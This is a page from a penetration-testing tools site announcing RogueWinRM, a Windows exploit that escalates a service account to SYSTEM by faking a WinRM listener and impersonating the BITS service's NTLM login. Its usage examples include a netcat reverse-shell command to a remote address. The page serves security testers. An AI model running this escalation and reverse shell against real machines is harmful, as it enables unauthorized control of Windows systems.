PentestTools
Penetration Testing Tools. Cyber Security and Technology News.
  • Facebook
  • Twitter
  • YouTube
  • Tumblr
  • Home
  • Tools
    • Cryptography and Encryption
    • Exploitation Tools
    • Information Gathering
    • Man-In-The-Middle
    • Mobile Security
    • Network Tools
    • Password Attacks
    • Pentest Linux Distributions
    • Post Exploitation
    • Reporting Tools
    • Reverse Engineering
    • Stress Testing
    • System Administration
    • Vulnerability Analysis
    • Web Application Security
    • Wireless Attacks
  • Shop
  • Articles
  • Video Tutorials
  • Contact Us
Zmap - A Fast Single Packet Network Scanner Designed For Internet-wide Network Surveys

Zmap – Single Packet Network Scanner Designed For Internet-wide Network Surveys

Sigurlx - A Web Application Attack Surface Mapping Tool

Sigurlx – A Web Application Attack Surface Mapping Tool

MetaFinder - Search For Documents In A Domain Through Google

MetaFinder – Search For Documents In A Domain Through Google

WPCracker - WordPress User Enumeration And Login Brute Force Tool

WPCracker – WordPress User Enumeration And Login Brute Force Tool

CDK - Zero Dependency Container Penetration Toolkit

CDK – Zero Dependency Container Penetration Toolkit

Reconftw - Simple Script For Full Recon

Reconftw – Simple Script For Full Recon

MobileHackersWeapons - Mobile Hacker's Weapons / A Collection Of Cool Tools Used By Mobile Hackers

MobileHackersWeapons – Mobile Hacker’s Weapons / A Collection Of Cool Tools

Git-Wild-Hunt - A Tool To Hunt For Credentials In Github Wild AKA Git*Hunt

Git-Wild-Hunt – A Tool To Hunt For Credentials In Github Wild AKA Git*Hunt

HosTaGe - Low Interaction Mobile Honeypot

HosTaGe – Low Interaction Mobile Honeypot

BigBountyRecon - This Tool Utilises 58 Different Techniques To Expediate The Process Of Intial Reconnaissance On The Target Organisation

BigBountyRecon – Utilises 58 Different Techniques On Intial Reconnaissance On The Target Organisation

Token-Hunter - Collect OSINT For GitLab Groups And Members And Search The Group And Group Members' Snippets, Issues, And Issue Discussions For Sensitive Data That May Be Included In These Assets

Token-Hunter – Collect OSINT For GitLab Groups And Members

ImHex - A Hex Editor For Reverse Engineers, Programmers And People That Value Their Eye Sight When Working At 3 AM.

ImHex – Hex Editor For Reverse Engineers, Programmers

MyJWT - A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)

MyJWT – A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)

SysWhispers2 - AV/EDR Evasion Via Direct System Calls

SysWhispers2 – AV/EDR Evasion Via Direct System Calls

ByteDance-HIDS - A Cloud-Native Host-Based Intrusion Detection Solution Project To Provide Next-Generation Threat Detection And Behavior Audition With Modern Architecture

ByteDance-HIDS – Next-Generation Intrusion Detection Solution Project

PentestTools
  • Home
  • Tools
    • Cryptography and Encryption
    • Exploitation Tools
    • Information Gathering
    • Man-In-The-Middle
    • Mobile Security
    • Network Tools
    • Password Attacks
    • Pentest Linux Distributions
    • Post Exploitation
    • Reporting Tools
    • Reverse Engineering
    • Stress Testing
    • System Administration
    • Vulnerability Analysis
    • Web Application Security
    • Wireless Attacks
  • Shop
  • Articles
  • Video Tutorials
  • Contact Us
PentestTools
  • Home
  • Tools
    • Cryptography and Encryption
    • Exploitation Tools
    • Information Gathering
    • Man-In-The-Middle
    • Mobile Security
    • Network Tools
    • Password Attacks
    • Pentest Linux Distributions
    • Post Exploitation
    • Reporting Tools
    • Reverse Engineering
    • Stress Testing
    • System Administration
    • Vulnerability Analysis
    • Web Application Security
    • Wireless Attacks
  • Shop
  • Articles
  • Video Tutorials
  • Contact Us
  • Facebook
  • Twitter
  • YouTube
  • Tumblr
Post Exploitation

RogueWinRM – Windows Local Privilege Escalation From Service Account To System

January 2, 2021
2 Min Read
RogueWinRM - Windows Local Privilege Escalation From Service Account To System
Mazen Elzanaty MazenElzanatyMazenElzanatyMazenElzanaty
Add Comment

[sc name=”ad_1″]

RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running (default on Win10 but NOT on Windows Server 2019).

Briefly, it will listen for incoming connection on port 5985 faking a real WinRM service.
It’s just a minimal webserver that will try to negotiate an NTLM authentication with any service that are trying to connect on that port.
Then the BITS service (running as Local System) is triggered and it will try to authenticate to our rogue listener. Once authenticated to our rogue listener, we are able to impersonate the Local System user spawning an arbitrary process with those privileges.

You can find a full technical description of this vulnerability at this link –> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/

Usage

RogueWinRM
Mandatory args:
-p <program>: program to launch
Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output

Examples

 

 

Running an interactive cmd:

RogueWinRM.exe -p C:windowssystem32cmd.exe

Running netcat reverse shell:

RogueWinRM.exe -p C:windowstempnc64.exe -a "10.0.0.1 3001 -e cmd"

Authors

  • Antonio Cocomazzi
  • Andrea Pierini
  • Roberto (0xea31)
Download RogueWinRM

https://platform.twitter.com/widgets.js
[sc name=”ad-in-article”]

TagsAccount command line debugging Escalation Local Netcat Netcat Reverse NTLM Privilege Privilege Escalation RogueWinRM Service System windows WinRM

You may also like

ToRat - A Remote Administation Tool Written In Go Using Tor As A Transport Mechanism And RPC For Communication
Post Exploitation

ToRat – Remote Administration Tool Written In Go Using Tor

December 15, 2020
Pytmipe - Python Library And Client For Token Manipulations And Impersonations For Privilege Escalation On Windows
Post Exploitation

Pytmipe – Token Manipulations And Impersonations For Privilege Escalation On Windows

December 8, 2020
Mikrot8Over - Fast Exploitation Tool For Mikrotik RouterOS
Post Exploitation

Mikrot8Over – Fast Exploitation Tool For Mikrotik RouterOS

October 17, 2020

About the author

View All Posts

Mazen Elzanaty

Add Comment

Click here to post a comment

Cancel reply

Emp3R0R – Linux Post-Exploitation Framework Made By Linux User
Ghost Framework – Post-Exploitation Framework That Exploits The Android Debug Bridge
Comment

Topics

  • Articles416
  • Cryptography and Encryption32
  • Exploitation Tools292
  • Forensics Tools23
  • Information Gathering254
  • Man-In-The-Middle19
  • Mobile Security19
  • Network Tools73
  • Password Attacks48
  • Pentest Linux Distributions24
  • Post Exploitation32
  • Reporting Tools11
  • Reverse Engineering44
  • Security Tools99
  • Shop5
  • Stress Testing1
  • System Administration92
  • Video Tutorials74
  • Vulnerability Analysis157
  • Web Application Security56
  • Wireless Attacks29

Archive

  • May 2021 (6)
  • April 2021 (9)
  • January 2021 (25)
  • December 2020 (60)
  • November 2020 (60)
  • October 2020 (62)
  • September 2020 (60)
  • August 2020 (60)
  • July 2020 (65)
  • June 2020 (69)
  • May 2020 (65)
  • April 2020 (2)
  • November 2019 (9)
  • October 2019 (39)
  • September 2019 (42)
  • April 2019 (1)
  • March 2019 (29)
  • February 2019 (58)
  • January 2019 (61)
  • December 2018 (62)
  • November 2018 (44)
  • October 2018 (76)
  • August 2018 (4)
  • July 2018 (27)
  • June 2018 (33)
  • May 2018 (17)
  • April 2018 (22)
  • March 2018 (35)
  • February 2018 (45)
  • January 2018 (58)
  • December 2017 (144)
  • November 2017 (106)
  • October 2017 (184)
Copyright © 2020. PentestTools
June 13, 2025
  • Facebook
  • Twitter
  • YouTube
  • Tumblr